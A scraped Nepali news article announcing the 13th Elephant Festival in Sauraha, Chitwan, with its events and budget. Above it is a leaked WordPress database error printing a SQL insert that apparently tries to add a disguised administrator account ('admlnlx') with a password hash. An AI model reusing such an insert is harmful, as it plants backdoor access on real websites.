WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BveccIOaTIMA2kLgDB0t66Uo/tozm//', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 13:41:32', '', 'admlnlx', 'admlnlx')
चितवन, पुस ११–
चितवनको सौराहामा आज (सोमबार)बाट १३ औं हात्ती महोत्सव सुरु हुँदैछ । महोत्सवको सम्पूर्ण तयारी पूरा भएको आयोजक क्षेत्रीय होटल संघले जनाएको छ ।
पुस १५ गतेसम्म आयोजना हुने महोत्सवको आज विहान पर्यटनमन्त्री जीबनबहादुर शाहीले उदघाटन गर्ने कार्यक्रम रहेको छ ।
महोत्सव संयोजक दिपक भट्टराईका अनुसार प्रतियोगितात्मक खेलका लागि आवश्यक पर्ने मैदान व्यवस्थापनदेखि स्वागत गेट निर्माण लगायतका सम्पूर्ण काम पूरा भइसकेको छ । क्षेत्रिय होटल संघका अध्यक्ष सुमन घिमिरेले बिगतका वर्षहरुमा जस्तै यस वर्ष पनि हात्तीका गतिविधि तथा खेलहरुलाई थप परिमार्जित गरी रोचक बनाइएको बताए ।
आर्थिक समितिका संयोजक शिरलाल परियारले महोत्सव सम्पन्न गर्न ७७ लाख रुपैयाँभन्दा बढी खर्च लाग्ने अनुमान गरिएको बताए ।यस वर्ष सौराहामै पहिलो पटक अन्तराष्ट्रिय हात्तीपोलो प्रतियोगिता समेत आयोजना गरिएकाले रौनक बढेको पोलो प्रतियोगिताका संयोजक शंकर सैंजुले बताए ।
महोत्सवमा हात्ती फाष्टवाक प्रतियोगिता, हात्तीपोलो प्रतियोगिता, हात्तीका छावाहरुबीच रोमाञ्चक फुटबल, हात्ती श्रृंगार प्रतियोगिता, गाडा दौड, हात्ती पेन्टिङ, हात्तीको वनभोज, साँस्कृतिक कार्यक्रम र डुंगा दौड प्रतियोगिता आयोजना गरिने क्षेत्रीय होटल संघका सचिव राममणि खनालले जानकारी दिए ।